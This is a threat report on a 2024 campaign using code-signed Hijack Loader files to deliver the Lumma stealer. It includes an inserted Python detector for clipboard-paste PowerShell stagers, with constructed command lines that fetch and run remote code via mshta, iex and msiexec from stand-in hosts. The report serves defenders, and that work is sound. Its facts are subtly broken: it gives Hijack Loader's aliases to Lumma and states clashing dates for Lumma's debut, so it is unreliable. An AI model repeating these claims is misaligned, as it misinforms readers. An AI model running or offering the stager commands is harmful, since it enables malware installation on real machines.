Introduction

In early October 2024 [5] [6], cybersecurity researchers identified a sophisticated malware campaign involving Hijack Loader artifacts signed with legitimate code-signing certificates [2] [3] [5] [6] [7]. This campaign, detected by the French cybersecurity firm HarfangLab [2] [3] [5] [7], aims to deploy an information stealer known as Lumma [2] [3] [5] [6] [7]. Operating under the Malware-as-a-Service (MaaS) model [1], Lumma has been active since September 2023 and is promoted on Russian-speaking dark web forums and a Telegram channel. The malware targets Windows operating systems and is designed to harvest sensitive information.

Description

Cybersecurity researchers have uncovered a sophisticated malware campaign involving Hijack Loader artifacts [6], which are signed with legitimate code-signing certificates [2] [3] [5] [6] [7]. Detected by the French cybersecurity firm HarfangLab in early October 2024, this campaign aims to deploy an information stealer known as Lumma [3] [5] [6] [7], also referred to as DOILoader [3] [5] [6] [7], IDAT Loader [3] [5] [6] [7], and SHADOWLADDER [5] [6]. Lumma [1] [2] [3] [4] [5] [6] [7], which first emerged in September 2023, operates under the Malware-as-a-Service (MaaS) model and has been promoted on Russian-speaking dark web forums and a Telegram channel since May 2023 [1]. This subscription-based malware targets Windows operating systems from Windows 7 to Windows 11 and is approximately 150-200 KB in size.

Attack chains typically involve tricking users into downloading malicious binaries disguised as illegal software or movies [5] [6]. Recent tactics have included directing users to fake human verification pages, often hosted on Content Delivery Networks, that present deceptive Google CAPTCHA prompts [4]. When users click the ‘I’m not a robot’ button [4], a PowerShell script is copied to their clipboard [4]. If executed, this script runs in a hidden window [4], retrieves further instructions from a remote server and ultimately downloads the Lumma Stealer malware [4]. The downloaded file [4], commonly named ‘dengo.zip’, must be unzipped and executed on a Windows computer for the malware to activate [4] and establish connections to attacker-controlled domains [4].

HarfangLab has observed three distinct versions of the PowerShell script since mid-September 2024: one that uses mshta.exe to execute code hosted on an external server [5] [6], another that runs a remotely hosted PowerShell script via the Invoke-Expression cmdlet (iex) [5] [6], and a third that employs msiexec.exe to download and execute a payload from an external URL [5] [6]. The ZIP archive contains a legitimate executable file vulnerable to DLL side-loading [5] [6], alongside the malicious Hijack Loader DLL [5] [6]. The purpose of the sideloaded DLL is to decode and execute an encrypted file included in the package [5] [6], which conceals the final stage of Hijack Loader [5] [6], aimed at downloading and executing a stealer implant [5] [6].
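As an added defender-side example (not code from the original article or any of its sources), the following Python scans constructed process-creation events for the three PowerShell stager variants described above (mshta.exe, iex, msiexec.exe) and raises the severity when the hidden-window switch and an explorer.exe parent, the traits of a pasted clipboard command, are also present. The event field names are assumed to follow Sysmon's process-creation schema; the command lines and .invalid URLs are constructed samples.

```python
import re
from typing import Optional

URL = r"https?://"
# The three stager variants from the text; every pattern in a list must match (any order).
STAGER_SIGNATURES = {
    "mshta_remote":   [r"\bmshta(?:\.exe)?\b", URL],               # mshta.exe runs remote code
    "iex_remote":     [r"\b(?:iex|invoke-expression)\b",          # remote script piped into iex
                       r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b"],
    "msiexec_remote": [r"\bmsiexec(?:\.exe)?\b", r"/i\s+" + URL],  # msiexec installs from a URL
}
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I)
USER_SHELL_PARENTS = {"explorer.exe"}  # Run-dialog pastes spawn as children of explorer.exe

# Constructed Sysmon-style process-creation events, not real telemetry.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "mshta http://verify.example.invalid/check.hta"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -WindowStyle Hidden "iex (irm http://verify.example.invalid/s2.ps1)"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden msiexec /i http://verify.example.invalid/pkg.msi /qn"},
    {"ParentImage": r"C:\Program Files\Vendor\Build\build.exe",
     "CommandLine": r"powershell -NoProfile -File C:\Scripts\rotate-logs.ps1"},  # benign admin task
]

def severity(hidden_window: bool, user_launched: bool) -> str:
    # Remote stager + hidden window + launched from the user's shell is the full
    # clipboard-paste chain; either extra trait on its own is only medium.
    if hidden_window and user_launched:
        return "high"
    return "medium" if (hidden_window or user_launched) else "low"

def classify_stager(cmdline: str) -> Optional[str]:
    """Return the matching stager variant name, or None when the command fits none."""
    for name, patterns in STAGER_SIGNATURES.items():
        if all(re.search(p, cmdline, re.I) for p in patterns):
            return name
    return None

def scan_events(events: list) -> list:
    """Turn process-creation events into findings, skipping commands with no remote stager."""
    findings = []
    for ev in events:
        cmd = ev.get("CommandLine", "")
        variant = classify_stager(cmd)
        if variant is None:
            continue
        parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
        hidden, from_user = bool(HIDDEN_WINDOW.search(cmd)), parent in USER_SHELL_PARENTS
        findings.append({"variant": variant, "severity": severity(hidden, from_user), "command": cmd})
    return findings
```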

Once a target is selected [1], Lumma performs system profiling to gather details about the operating system [1], hardware [1], and language to filter out unwanted targets [1]. It then collects sensitive information, focusing on browser data from Chromium and Mozilla-based browsers [1], including browsing history [1], cookies [1], extensions [1], usernames/passwords [1], personal identification details [1], and credit card information [1]. Additionally, Lumma seeks to identify cryptocurrency wallets and two-factor authentication (2FA) information before exfiltrating the data to its Command and Control (C2) server [1].

In early October 2024 [5] [6], the delivery mechanism shifted from DLL side-loading to utilizing various signed binary files to evade detection by security software [5] [6]. It remains unclear whether the code-signing certificates were stolen or intentionally generated by the threat actors [5] [6], although HarfangLab has assessed with low to moderate confidence that they may have been created intentionally [6]. The certificates have since been revoked [5] [6]. This research highlights that obtaining and activating a code-signing certificate is largely automated [6], requiring only a valid business registration number and a contact person [6]. This underscores that malware can be signed [6], indicating that code signatures alone cannot be relied upon as indicators of trustworthiness [5].

Furthermore, AttackIQ has developed an assessment template outlining the post-compromise Tactics [1], Techniques [1], and Procedures (TTPs) associated with Lumma Stealer’s recent activities [1], designed to help organizations validate their security controls against this financially motivated threat [1], which is adept at harvesting sensitive information quickly and automatically [1].

To mitigate risks [4], users should exercise caution with suspicious websites [4], refrain from running unknown commands [4], keep antivirus software updated [4], and ensure their systems are patched [4].

Conclusion

The Lumma malware campaign underscores the evolving sophistication of cyber threats, particularly those leveraging legitimate code-signing certificates to bypass security measures. The shift in delivery mechanisms highlights the adaptability of threat actors in evading detection. Organizations must remain vigilant, employing robust security controls and continuously updating their defenses to mitigate such threats. Users are advised to exercise caution online, maintain updated antivirus software, and ensure systems are patched to protect against this and similar threats. The research emphasizes the need for a comprehensive approach to cybersecurity, as code-signing certificates alone cannot guarantee trustworthiness.

References

[1] https://www.attackiq.com/2024/10/15/emulating-lumma-stealer/
[2] https://www.cybersecurityinformer.com/edition/daily-data-preservation-scams-2024-10-14/
[3] https://www.linkedin.com/posts/wdevaultnew-malware-campaign-uses-purecrypter-loader-activity-7251983259700453376-68KN
[4] https://ardwatalab.net/news-headlines/windows-users-are-being-tricked-by-sneaky-malware-scheme
[5] https://thehackernews.com/2024/10/researchers-uncover-hijack-loader.html
[6] https://www.techidee.nl/onderzoekers-ontdekken-hijack-loader-malware-met-behulp-van-gestolen-code-signing-certificaten/15293/
[7] https://www.linkedin.com/posts/wdevault_new-linux-variant-of-fastcash-malware-targets-activity-7251983253388025857-NQxP